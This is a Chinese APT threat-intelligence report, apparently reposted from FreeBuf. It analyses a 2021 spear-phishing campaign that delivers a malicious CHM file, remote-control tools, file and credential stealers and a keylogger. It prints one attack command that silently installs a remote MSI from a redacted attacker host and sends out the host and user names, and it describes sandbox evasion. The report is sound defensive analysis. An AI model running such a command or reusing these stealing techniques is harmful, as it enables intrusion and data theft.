子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

“苦象”组织上半年针对我国的攻击活动分析 – 作者:antiylab

090

1、概述

近期,安天CERT在梳理安全事件时,发现一批针对我国军工、贸易和能源等领域的网络攻击活动。攻击手法存在伪造身份向目标发送鱼叉邮件,投递恶意附件诱导受害者运行。经归因分析发现,这批活动具备APT组织“苦象”[1]的历史特征,且在针对目标、恶意代码和网络资产等层面均存在关联,属于“苦象”组织在2021年上半年的典型攻击模式。相关攻击活动的特征总结如下:

表1-1 攻击活动特征
v2-0329522ab38adfa014527f6b9486405c_720w.jpg

此外,安天CERT还跟踪、关联到“苦象”组织上半年使用过的多个窃密插件,其攻击技术和代码功能均带有该组织的明显特征,在关联分析章节我们将对asms和sthost两个典型插件进行分析。

2、事件分析

2.1 初始诱饵分析

攻击者会以“会议议程”等邮件主题,伪造受害者可能感兴趣的发件人向目标连续投递多封鱼叉邮件,邮件附件中包含恶意的CHM文件,案例如图:

v2-adc61b3a34196edaaeb2fee987dcbcb4_720w.jpg图2-1 附件压缩包中的内容

表2-1 样本标签v2-6b3251747ae851e8b8705fc17c1c7b72_720w.jpg

“会议议程.chm”为包含恶意脚本的Windows帮助文件,静态属性皆不可用,点击执行后看到的正文为空白:v2-6fb5d6bc4b9dc3ab4503d97d3684316e_720w.jpg

图2-2 CHM文件的正文及属性

此刻,其含有的经混淆的恶意脚本被自动运行,作用是添加一个每15分钟运行一次的系统任务计划:

v2-5a80d556a23c6fcc7a6b22909dc9f325_720w.jpg图2-3 CHM文档包含的恶意脚本

任务计划名为“DefenderService”,操作对象为以msiexec命令运行远程的MSI文件,过程完全静默且不重启系统,同时提交本机的主机名和用户名:

%coMSPec% /c start /min msiexec /i http://***.com/***/crt.php?h=%computername%*%username% /qn /norestart

攻击者疑似会针对目标选择性下发CERT.msi的文件内容。CERT.msi负责向以下目录释放下载器模块winupd.exe,下载器模块功能是从C2服务器获取一系列的功能插件,保存在同一目录下:

C:Users***AppDataRoamingMicrosoftWindowsSendTo

在观察到的案例中,陆续功能插件的选取和部署过程约在半小时内完成。

表2-2恶意文件信息列表v2-b83e24df28e03dfea062af69ef31f02b_720w.jpg

2.2 部署插件分析

远控插件1:

插件名称:MtMpEnq.exe

MD5: EF099D5FE4075132BF3812C9D5FFA8F9

功能简介:该样本是一个远控。主要功能是对文件进行浏览、传输。也可以执行cmd命令。

C2地址为45.11.***.***,端口34318:

v2-07b0dfbfeefacbbf9f44e62656511868_720w.jpg图2-4 远控插件1硬编码的C2

表2-3 远控插件1控制指令v2-ddefb92a1b62cb38b4dfa4b6251793fb_720w.jpg

远控插件2:

插件名称:mtAdvanced4.exe

MD5: BD054C4F43808EF37352F36129BF0C3D

功能简介:该样本是一个远控。主要功能是对文件进行浏览、传输。也可以执行cmd命令。

C2地址为45.11.***.***,端口80:

v2-2c0146ed2b9db60cefa615794ed91692_720w.jpg图2-5 远控插件2硬编码的C2

表2-4 远控插件2控制指令v2-a2da58f5ff0dac93a00127a93351f1b1_720w.jpg

文件窃取插件:

插件名称:sysmgr.exe

MD5: ade9a4ee3acbb0e6b42fb57f118dbd6b

功能简介:窃取本机文件,将文件数据POST回攻击者服务器。

选取以下后缀的文件:

表2-5 指定的文件窃取对象v2-53fdaae834544193f4005c4bbc3935ac_720w.jpg

C2:http://***.net/UihbywscTZ/45Ugty845nv7rt.php,80端口

v2-310894fa58f4d3aa0878a0959c6a8f04_720w.jpg图2-6 文件窃密插件的上传流量

浏览器凭证窃密插件:

插件名称:mvrs_crsh.exe

MD5: 7ABCCA95BC9C69D93BE133F6597717C0

功能简介:获取火狐和谷歌浏览器保存的用户名和密码,保存在文件“en-GB-4-0.txt”。

v2-df2130fcaf49d20db0faf2ec89e69e2e_720w.jpg图2-7 浏览器窃密插件的窃取对象

键盘记录插件:

插件名称:scvhost.exe

MD5: 578918166854037CDCF1BB3A06A7A4F3

功能简介:该程序被加入系统注册表中的Run启动项,用于记录目标机器上的按键行为,并将按键信息先写入临时缓冲文件“syslog0812AXbcW.tean”,然后汇入最终的存储文件“syslog0812AXbcW.neat ”。.neat 文件中的数据最终会被攻击者下发的文件窃取类插件如sysmgr.exe搜寻并上传。

注册键盘钩子,记录按键:

v2-076f656b38887d06c0e1ed5d3978c6a6_720w.jpg图2-8 击键窃密插件的按键记录功能

检测到“ctrl+v”后读取剪贴板内容:

v2-36e5beb0413a8b626fb55dac6a194464_720w.jpg图2-9 击键窃密插件的剪贴板记录功能

将监控到的按键信息写入文件“syslog0812AXbcW.tean”:

v2-e8574ef5fb637892c1c29cdab1a6da58_720w.jpg图2-10 击键窃密插件的数据保存位置

记录文件加密方法为每个字节加0x14(解密时每个字节减0x14):

v2-53b0b4d76718762438bcabbf4b7f8953_720w.jpg图2-11 击键窃密插件的数据加密方法

3、关联分析

安天CERT通过代码特点、技术手法和向量特征等技术进行关联分析,发现“苦象”组织使用过的数个功能插件,其中多数用于在目标机器上进行窃密作业。本章披露的asms和sthost插件与2.2章节提及的文件窃密插件sysmgr.exe在功能代码设计上十分相近,攻击者以相同逻辑实现类似的文件筛选、过滤、记录等窃密功能,在规避检测方面也使用十分相同的技术方法。

3.1 asms插件分析

表3-1 窃密样本标签v2-d544853ed251bbe20cc5864216705c11_720w.jpg

该插件是“苦象”组织窃取信息的木马,其主要功能为窃取主机硬盘驱动器中doc、docx、ppt、pptx、xls、pdf、zip、txt以及apk等类型的文件,同时该窃密木马还会探测主机是否存在光盘驱动器,如果存在,则将光盘驱动器中存在的所有文件也回传至攻击的服务器。

当木马在主机中运行时,首先会进行休眠操作,休眠的秒数由其自身随机生成,休眠的目的是为了逃避沙箱的检测。

v2-7ee2cd7c71d27bf12b631d2a69b779ce_720w.jpg图3-1 随机休眠3

休眠完成后,木马会在自身所在目录下创建名为“errore.log”、“error1log.txt”的文件,error1log.txt文件作用是储存后续收集的文件信息,而errore.log文件作用是对自身的操作进行标识。

v2-ce1b549cf18cf5faba0d33895fe53b9a_720w.jpg图3-2 创建errore.logv2-f6e99eeff232bcf3903e96d90dcd794b_720w.jpg图3-3 创建error1log.txt

上述文件创建完成后,木马开始收集主机中不在排除路径列表且符合类型的文件信息,包括文件的完整路径以及文件的创建时间戳。同时,当木马探测到主机中存在光盘驱动器时,木马也会收集光盘驱动器中存在的文件。收集信息完成后,木马则会将收集的文件信息以“创建时间戳_文件路径||” 的形式写入error1log.txt。

v2-2cd269714b4c6c19f3782a08ee603f1c_720w.jpg图3-4 攻击者需要收集的类型v2-9aea11dd830e8a0c7b166deb99f44ec8_720w.jpg图3-5 需要排除的路径v2-37d7d71cee2d83d1a1dc6b1adab16705_720w.jpg图3-6 收集文件信息v2-8aed2e718cebf561b3eb9a73646b630e_720w.jpg图3-7 搜索指定类型文件v2-5fa776fdf6dd5cda9733654205741e5c_720w.jpg图3-8 将收集的信息写入error1log.txtv2-7ad46ced3c90ccabecae2cd4bc9c15d6_720w.jpg图3-9 error1log.txt文件内容

完成收集信息操作后,木马会在当前目录下创建cachex86.tmp,cachex86.tmp的作用是存储由38位随机字符加机器名形成唯一标识符,标识符的作用在于后续回传窃取的信息时对受害主机进行区分。

v2-fc8a8bcbf0d4b27e64f25a68b8c37083_720w.jpg图3-10 将标识符写入cachex86.tmp文件v2-c16308ccebe0424a32eaedb38ac591b7_720w.jpg图3-11 cachex64.tmp

最后,木马会将存储文件信息的error1log.txt以及收集的文件以不加密的方式回传至攻击者的C2服务器。

v2-aa34c4051b7b902dabbe25b27bc6075c_720w.jpg图3-12 回传收集的信息v2-3ce7cc8df25462127428dac9cce7770e_720w.jpg图3-13 回传error1log.txt的流量v2-bca482c4ad398730d8187cd59040e5d4_720w.jpg图3-14 回传文件的流量

3.2 sthost插件分析

表3-2 窃密样本标签v2-eea5c8dd0b55edba94868ce3dd663e13_720w.jpg

该插件为窃密类木马,时间戳经过伪造,内部字符串等信息使用AES加密,运行后解密使用。样本会收集主机基本信息回传,收集指定后缀文件路径并记录到文本,然后根据关注的重点路径和文件修改时间进行筛选,最后对筛选的文件进行回传。

样本在主函数中首先对加密字符串进行解密,其加密字符串首先将空格替换成加号,进行base64解码,随后利用内置密码通过使用基于HMACSHA1的伪随机数生成器,实现基于密码的密钥派生,生成AES算法密钥和初始化向量,最终解密字符串,解密算法如下所示:

v2-82850d095d369e46e355f21813779225_720w.jpg图3-15 字符串解密

解密出的字符串如下所示:

v2-215d151391e0f787e92477a343e0c1fe_720w.jpg图3-16 解密结果

样本解密字符串后,进入无限循环,用于获取指定系统信息与文件信息并回传,并且每次获取回传都会间隔较长时间:

v2-6662f83fa481c20e86b3110135be733f_720w.jpg图3-17 获取信息回传

回传的系统信息经过简单的凯撒加密,算法如下所示:

v2-80409cd00732af39e47d79c1b007545c_720w.jpg图3-18 系统信息加密

在获取信息时,样本自定义了一个Listing的类用于文件信息收集功能,该类初始化结果如下:

v2-b2c594511a01f56f067877223927d612_720w.jpgv2-03d305f64f407e8648bccad4da8ab123_720w.jpg图3-19 信息收集Listing类

其中RequiredExtension为需要收集的文件后缀,BlacklistFolder为无需遍历的文件夹名称。最后生成的文件内容格式为“文件路径|ddMMyyyy|HHmmss”,实验环境中如下所示:

v2-e28e6c480cba640037975257e3023659_720w.jpg图3-20 收集的信息内容和格式

该类还实现了通过文件最后修改时间(100天内)和文件路径进行筛选的功能。

v2-ee2ba428fc8002c86308d116730f4268_720w.jpg图3-21 根据最后写入时间进行分类v2-265789566d9e45c8684f2cf811064d39_720w.jpg图3-22 根据路径进行筛选

最终将筛选出的文件进行上传:

v2-22e6c5f6bbfd3143d677dfbcfe21fa2f_720w.jpg图3-23 上传文件

4、威胁框架视角的攻击映射

本次系列攻击活动共涉及ATT&CK框架中10个阶段的18个技术点,具体行为描述如下表:

表4-1 近期“苦象”组织攻击活动的技术行为描述表v2-bbb91feeca7985f168012040e728ee7f_720w.jpg

将涉及到的威胁行为技术点映射到ATT&CK框架如下图所示:

v2-0403c412eef08820c7faa9f2e486c58c_720w.jpg图4-1 近期“苦象”组织攻击活动对应ATT&CK映射图

附录:参考连接

[1] “苦象”组织近期网络攻击活动及泄露武器分析

https://www.antiy.com/response/2020

来源:freebuf.com 2021-07-06 14:55:38 by: antiylab

相关推荐: 【爱加密】移动安全在运营商行业的应用与分析 – 作者:爱加密123

近日,天翼网信安全产业联盟发布了总第1期专刊,北京智游网安科技有限公司(爱加密)《移动安全在运营商行业的应用与分析》解决方案成为专刊亮点。作为联盟首批成员单位及重要合作伙伴,爱加密一方面将通过领先的专业技术、优质的服务体系助力电信行业移动应用安全生态的建设;另…

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
安全网站文章
# 攻击# 分析# 苦象
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-公司成功上市啦! – 作者:KOAL格尔国信
公司成功上市啦! – 作者:KOAL格尔国信
公司成功上市啦! – 作者:KOAL格尔国信
3年前 4973
安全小百科-GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
3年前 2044
安全小百科-科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
3年前 1053
安全小百科-Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
3年前 902
安全小百科-Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
3年前 781
安全小百科-『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
3年前 718
评论 抢沙发

请登录后发表评论

搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
049730
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47710
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
020440
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
012870
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
011960
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
010530
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛1年前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666